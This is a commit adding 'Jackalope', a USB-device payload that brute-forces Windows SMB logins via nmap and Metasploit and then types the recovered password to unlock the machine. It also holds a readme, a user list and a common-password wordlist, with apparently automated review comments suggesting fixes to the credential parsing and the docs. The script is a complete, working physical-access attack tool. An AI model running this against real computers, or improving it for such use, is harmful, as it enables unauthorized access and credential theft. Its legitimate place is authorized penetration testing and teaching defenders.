Add Jackalope (#380)

* Adding Jackalope, a Bunny+Metasploit chimera project.

* Fixing inaccurate documentation.

* Generate the password entry payload on the alternate switch.

* Additional documentation concerning alternate payload mechanism.

* Branding

* Update readme.md

* Rearchitecting payload to be independent. No longer overwrites alternate payload location. Uses WAIT interface to interact with the tester to reuse a password, clear the password, and re-attack the machine.
pull/381/head
Catatonic 2019-05-22 16:53:59 -07:00 committed by Darren Kitchen
parent 6760498c27
commit f171837db2
4 changed files with 268 additions and 0 deletions

@ -0,0 +1,118 @@
#!/bin/bash
#
# Title: Jackalope
# Author: catatonic
# Version: 1.1.0
# Check readiness & prepare environment
LED SETUP
# REQUIRE-TOOL metasploit-framework
ATTACKMODE HID RNDIS_ETHERNET
# Ensure loot is available for recording results.
mount /dev/nandf /root/udisk/
ORIGINAL_SWITCH=$SWITCH_POSITION
PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION
LOOTBASE=/root/udisk/loot/Jackalope/
# SETUP
GET TARGET_IP
GET TARGET_HOSTNAME
COUNT=$(ls -lad $LOOTBASE/$TARGET_HOSTNAME* | wc -l)
COUNT=$((COUNT+1))
LOOTDIR=$LOOTBASE/$TARGET_HOSTNAME-$COUNT
mkdir -p $LOOTDIR
source /etc/profile.d/rvm.sh
rvm --default use 2.6.2 >> $LOOTDIR/log.txt
MSF_DIR=/tools/metasploit-framework
# Save environment informaiton:
echo "PAYLOAD_DIR: $PAYLOAD_DIR" >> $LOOTDIR/log.txt
echo "MSF_DIR: $MSF_DIR" >> $LOOTDIR/log.txt
echo "LOOTDIR: $LOOTDIR" >> $LOOTDIR/log.txt
echo "TARGET_IP: $TARGET_IP" >> $LOOTDIR/log.txt
echo "TARGET_HOSTNAME: $TARGET_HOSTNAME" >> $LOOTDIR/log.txt
SYNC ()
{
sync; sleep 1; sync
}
CLEAR_PW()
{
LED SPECIAL
rm $PAYLOAD_DIR/quack_pass.txt
SYNC
WAIT
}
ENTER_PW()
{
sleep 1
QUACK $ORIGINAL_SWITCH/quack_pass.txt
QUACK ENTER
}
RECON()
{
ATTACKMODE RNDIS_ETHERNET
# Stage 1: Recon
LED STAGE1
echo "Executing nmap..." >> $LOOTDIR/log.txt
nmap -p 445 -Pn $TARGET_IP > $LOOTDIR/nmap_results.txt
if ! grep --quiet "445.*open" $LOOTDIR/nmap_results.txt;
then
LED FAIL2
SYNC
exit
fi
}
EXPLOIT()
{
# Stage 2: Exploit
LED STAGE2
export HOME=/root
cd $MSF_DIR
./msfconsole -q -x "use auxiliary/scanner/smb/smb_login; set RHOSTS $TARGET_IP; set USER_FILE $PAYLOAD_DIR/userlist.txt; set PASS_FILE $PAYLOAD_DIR/wordlist.txt; run; exit" > $LOOTDIR/msfconsole.txt
if ! grep --quiet "^\[+\]" $LOOTDIR/msfconsole.txt;
then
LED FAIL
echo "Payload failed, no logins found..." >> $LOOTDIR/log.txt
SYNC
exit
fi
grep "^\[+\]" $LOOTDIR/msfconsole.txt | grep -o \'.*\' | cut -d ':' -f 1 | cut -d "'" -f 2 > $LOOTDIR/user.txt
grep "^\[+\]" $LOOTDIR/msfconsole.txt | grep -o \'.*\' | cut -d ':' -f 2 | cut -d "'" -f 1 > $LOOTDIR/password.txt
# Focus needs to be set on the password field manually.
echo -n "STRING " > $PAYLOAD_DIR/quack_pass.txt
cat $LOOTDIR/password.txt >> $PAYLOAD_DIR/quack_pass.txt
SYNC
}
# High level view.
while true
do
if [ -f $PAYLOAD_DIR/quack_pass.txt ];
then
LED FINISH
else
RECON
EXPLOIT
continue
fi
WAIT
# User's choice, clear old password or enter password.
if [ "$SWITCH_POSITION" == "switch3" ];
then
CLEAR_PW
else
ENTER_PW
fi
done
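Review bot: The credential extraction on the two `grep "^\[+\]" ... | cut` lines is fragile: it assumes exactly one `[+]` line and that neither the username nor the password contains `:` or `'`, so a second hit or a password with either character produces a multi-line or truncated `password.txt` and a `quack_pass.txt` that types the wrong string; take the first match (`head -n 1`) and capture the text between the last `:` and the closing quote with a single `sed` expression instead of the two `cut` chains. Two state-machine points to confirm: the loop compares `$SWITCH_POSITION` only after `WAIT` returns, so it depends on that variable being refreshed rather than holding the boot-time position (otherwise the `switch3` branch never fires), and `ENTER_PW` calls `QUACK` after `RECON` has switched to `ATTACKMODE RNDIS_ETHERNET` alone, so verify the HID interface is still enumerated at that point. Minor: `rm $PAYLOAD_DIR/quack_pass.txt` should be `rm -f` (the file is absent on a fresh run), the `ls ... | wc -l` counter writes an error to the console the first time no loot directory exists, every path variable is used unquoted, and `informaiton` in the comment is a typo. `password.txt` and `quack_pass.txt` leave the recovered credential in clear text on the udisk, which the loot section of the readme should state.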

@ -0,0 +1,49 @@
# Jackalope
```
`\ # # /'
| \ # # /;|
\ :\# #|; /
\./#_#\./
/ \
: O O "
| \ / |
\ v /
\_x_/
Jackalope
by: catatonic
```
* Author: catatonic
* Target: Windows (for now)
## Description
Uses ethernet to attempt dictionary attacks against passwords. When the password is discovered a payload is automatically generated and placed in the alternate switch location. This alternate payload may be used to unlock the machine by:
1. Checking loot OR...
2. Manually select user/password at login screen
3. Flip switch to alternate payload to enter password
To clear an already identified password from a GREEN status light, flip the switch to switch3 (arming) and the status light will change to SPECIAL (cyan).
## Configuration
No initial configuration is required for bunny firmware v1.6+.
### Per attack configuration
1. userlist.txt contains usernames to use in attack.
2. wordlist.txt contains passwords to use in attack.
Note: A fantastic collection of password wordlists are available: [SecLists](https://github.com/danielmiessler/SecLists)
## STATUS
| LED | Status |
| ----------------------- | ---------------------------------------------- |
| FAIL | Attack failed, username/password not found |
| FAIL2 | Attack failed, network inaccessible |
| STAGE 1 | Stage 1: checking for SMB port with nmap |
| STAGE 2 | Stage 2: Brute forcing |
| Green (solid) | Attack complete, check loot or flip switch to switch1 or switch2 to enter password. Flip switch to switch3 (arming) to clear password. |
| SPECIAL | Clearing/cleared password, flip switch to switch 1 or switch 2 to initiate attack. |
| Purple (solid) | Preparing to attack |
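Review bot: The Description section still documents the earlier flow ("placed in the alternate switch location", "Flip switch to alternate payload"), which contradicts both the commit message ("No longer overwrites alternate payload location") and the STATUS table's own instructions (green: flip to switch1 or switch2 to enter the password, switch3 to clear); rewrite steps 1 to 3 around the WAIT-driven flow the payload actually implements. The LED names should match the code: the payload uses `LED STAGE1`/`LED STAGE2` (not "STAGE 1"/"STAGE 2"), `LED FINISH` for the "Green (solid)" row and `LED SETUP` for the "Purple (solid)" row. Configuration should also list the `# REQUIRE-TOOL metasploit-framework` dependency (expected at `/tools/metasploit-framework` with rvm Ruby 2.6.2), since "No initial configuration is required" only holds once that tool is installed, and should say where results land (`loot/Jackalope/<hostname>-<n>/`, with the found password stored in clear text).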

@ -0,0 +1 @@
Administrator

@ -0,0 +1,100 @@
123456
password
12345678
qwerty
123456789
12345
1234
111111
1234567
dragon
123123
baseball
abc123
football
monkey
letmein
696969
shadow
master
666666
qwertyuiop
123321
mustang
1234567890
michael
654321
pussy
superman
1qaz2wsx
7777777
fuckyou
121212
000000
qazwsx
123qwe
killer
trustno1
jordan
jennifer
zxcvbnm
asdfgh
hunter
buster
soccer
harley
batman
andrew
tigger
sunshine
iloveyou
fuckme
2000
charlie
robert
thomas
hockey
ranger
daniel
starwars
klaster
112233
george
asshole
computer
michelle
jessica
pepper
1111
zxcvbn
555555
11111111
131313
freedom
777777
pass
fuck
maggie
159753
aaaaaa
ginger
princess
joshua
cheese
amanda
summer
love
ashley
6969
nicole
chelsea
biteme
matthew
access
yankees
987654321
dallas
austin
thunder
taylor
matrix
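Review bot: This default list only works with the `cut -d ':'` / `cut -d "'"` parsing in payload.txt because none of its entries contain `:` or `'`; the readme's pointer to SecLists invites substitutions that do, so either document that restriction next to the wordlist.txt bullet or harden the parser. A short note in the readme that this is a placeholder top-100 list, with its source, would also help reviewers judge its scope.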